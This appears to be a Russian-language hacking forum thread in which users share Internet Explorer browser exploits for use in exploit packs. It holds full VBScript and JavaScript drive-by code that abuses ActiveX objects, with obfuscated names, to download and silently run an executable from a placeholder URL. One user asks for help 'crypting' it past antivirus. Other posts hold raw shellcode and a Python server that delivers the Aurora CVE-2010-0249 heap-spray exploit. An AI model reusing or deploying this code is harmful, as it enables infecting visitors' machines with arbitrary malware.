что ж там мотать - ложишь сплойт в папку сплойтов и дописываешь соответствующий include в разделе перебора браузеров (switch case или if else)

Вот (http://slil.ru/25750027) небольшой сплойтег под ие6

*DeViL*
Это всё под шестой, седьмой они не пробивают

пара эксплоитов для для ие 6, последний билд авант браузера тож пробивает. позволяет скачать и запустить файл :) хз выкладывалось или нет, кто сможет криптануть мне в личку напишите

<SCRIPT language="VBScript">

Module_Path="http://путь до файла.exe"

If navigator.appName="Microsoft Internet Explorer" Then

If InStr(navigator.platform,"Win32") <> 0 Then

Const ssfFONTS=20
Const adModeReadWrite=3
Const adTypeBinary=1
Const adSaveCreateOverWrite=2

Dim oRDS
Dim oXMLHTTP
Dim oFSO
Dim oStream
Dim oWShell
Dim oShellApp

Dim WinDir
Dim ExeName
Dim XMLBody
Dim PluginFile
Dim cByte
Dim ObjName
Dim ObjProg

Randomize

ExeName=GenerateName()
ExeName=ExeName & ".exe"

cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4

Set oRDS=document.createElement("object")
oRDS.setAttribute "id","oRDS"
oRDS.setAttribute "classid",clsfull

Set oShellApp = oRDS.CreateObject("Shell.Application","")
Set oFolder = oShellApp.NameSpace(ssfFONTS)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
ExeName=WinDir & ExeName

ObjName="Microsoft"
ObjProg="XMLHTTP"
set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
oXMLHTTP.Send()
On Error Resume Next
XMLBody=oXMLHTTP.responseBody

ObjName="ADODB"
ObjProg="Stream"
On Error Resume Next
Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
If Err.number <> 0 Then

Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
Plugin_size=LenB(XMLBody)

For j=1 To Plugin_size
cByte=MidB(XMLBody,j,1)
ByteCode=AscB(cByte)
PluginFile.Write(Chr(ByteCode))
Next
PluginFile.Close

Set oWShell=oRDS.CreateObject("WScript.Shell","")
On Error Resume Next
oWShell.Run (ExeName),1,FALSE
Else
oStream.Mode=adModeReadWrite
oStream.Type=adTypeBinary
oStream.Open
oStream.Write XMLBody
oStream.SaveToFile ExeName,adSaveCreateOverWrite

oShellApp.ShellExecute ExeName
End If


End If
End If

Function GenerateName()
RandomName=""
rr=Int(8*Rnd)
ik=0
Do
ii=Int(25*Rnd)+97
RandomName=RandomName+Chr(ii)
ik=ik+1
Loop While ik<rr
GenerateName=RandomName
End Function

</SCRIPT>

<SCRIPT language="javascript">

var bb949531092ff = "http://путь до файла";
function CreateO(o, n) {
var r = null;

try { eval('r = o.CreateObject(n)') }catch(e){}

if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}

return(r);
}

function Go(a) {
var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
var o = CreateO(a, "ADO"+"DB.Str"+"eam");
var e = s.Environment("Process");

var bb351865611ff = null;
var bin = e.Item("TEMP")+ "\\" + "fdklkjTUFOYUT.exe";
var bb532058559ff;

try { bb351865611ff=new XMLHttpRequest(); }
catch(e) {
try { bb351865611ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
catch(e) {
bb351865611ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
}
}

if (! bb351865611ff) return(0);

bb351865611ff.open("GET", bb949531092ff, false)
bb351865611ff.send(null);
bb532058559ff = bb351865611ff.responseBody;

o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(bb532058559ff);
o.SaveToFile(bin, 2);

s.Run(bin,0);
}

var i = 0;
var bb804375678ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (bb804375678ff[i]) {
var a = null;

if (bb804375678ff[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + bb804375678ff[i].substring(1, bb804375678ff[i].length - 1));
} else {
try { a = new ActiveXObject(bb804375678ff[i]); } catch(e){}
}

if (a) {
try {
var b = CreateO(a, "WSc"+"ript.She"+"ll");
if (b) {
Go(a);
//return(0);
}
} catch(e){}
}
i++;
}

</script>


а в каком расширении эти сплоиты php или html ?...

Тупим? Это javascript

Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель

Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель


ставь на хостинг www.ho.ua (http://www.ho.ua)

10 декабря, 2008
Программа: Microsoft Internet Explorer 7.x
Опасность: Критическая
Наличие эксплоита: Да

Облазил сайт - не нашел сам эксплоит, подскажите где взять?

Облазил сайт - не нашел сам эксплоит, подскажите где взять?
http://www.xakep.ru/post/46406/default.asp

никто не знает нет ли такой уязвимости в интернет экспплорере которая позволяет получить доступ к файловой системе компа ? например это некий active - X файл, который выполнится на html странице и которыйи позволит из-за дыры в интернет эксплорере выполнить произвольный код ? или это фантазии...=)

Скажите мне молодому, не опытному, залил armitage, все хорошо, но файлик GeoIP.dat нифига не закачалсО...нездоровая канитель


Может ты не из 6 осла пробовал, а из 7.
7 на звере установлен.

Может ты не из 6 осла пробовал, а из 7.
7 на звере установлен.

помогите разобраться,

во многих сплойтах встречаю строки типа:

//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//

вопрос, как это хозяйство расшифровать?)

пробовал так:

document.write (unescape(Shellcode));

но в результате получаю иероглифы. :(
объясните плз как расшифровывать/зашифровывать код по такой схеме. день провел в гугле, но ничего толкового так и не нашел..

Это не надо расшифровывать. Это нужно заменить своим кодом (payload)

Эххх... а такой эксплоит то и пропустили :( ...
а ведь и шуму то он наделал *речь о Авроре*





#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# This program acts as a web server that generates an exploit to
# target a vulnerability (CVE-2010-0249) in Internet Explorer.
# The exploit was tested using Internet Explorer 6 on Windows XP SP2.
# The exploit's payload spawns the calculator.
#
# Usage : python ie_aurora.py [port number]
#

import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):

def convert_to_utf16(self, payload):
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i + j]) & 0xff) << (j * 8)
enc_payload += '%%u%04x' % num
return enc_payload

def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73'
payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\ xf5\x0e'
payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\ x20\x1a'
payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\ x71\x97'
payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\ x54\x56'
payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\ xfa\x85'
payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\ x6b\xc1'
payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\ xbd\x85'
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\ x6f\x02'
payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\ xca\x5e'
payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\ x88\x61'
payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
return self.convert_to_utf16(payload)

def get_exploit(self):
exploit = '''
<html>
<head>
<script>

var obj, event_obj;

function spray_heap()
{
var chunk_size, payload, nopsled;

chunk_size = 0x80000;
payload = unescape("<PAYLOAD>");
nopsled = unescape("<NOP>");
while (nopsled.length < chunk_size)
nopsled += nopsled;
nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}

function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}

function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}

function ev2()
{
var data, tmp;

data = "";
tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}

function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}

if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank'

</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
return exploit

def get_image(self):
content = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\ x00\xff\xff\xff'
content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\ x00\x02\x02\x44'
content += '\x01\x00\x3b'
return content

def log_request(self, *args, **kwargs):
pass

def do_GET(self):
try:
if self.path == '/':
print
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0]
self.wfile.write(self.get_exploit())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path == '/aurora.gif':
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.end_headers()
self.wfile.write(self.get_image())
except:
print ' Error : an error has occured while serving the HTTP request'
print '[-] Exiting ...'
sys.exit(-1)


def main():
if len(sys.argv) != 2:
print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
sys.exit(0)
try:
port = int(sys.argv[1])
if port < 1024 or port > 65535:
raise ValueError
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
try:
serv.serve_forever()
except:
print '[-] Exiting ...'
except socket.error:
print ' Error : a socket error has occurred'
sys.exit(-1)
except ValueError:
print ' Error : an invalid port number was given'
sys.exit(-1)

if __name__ == '__main__':
main()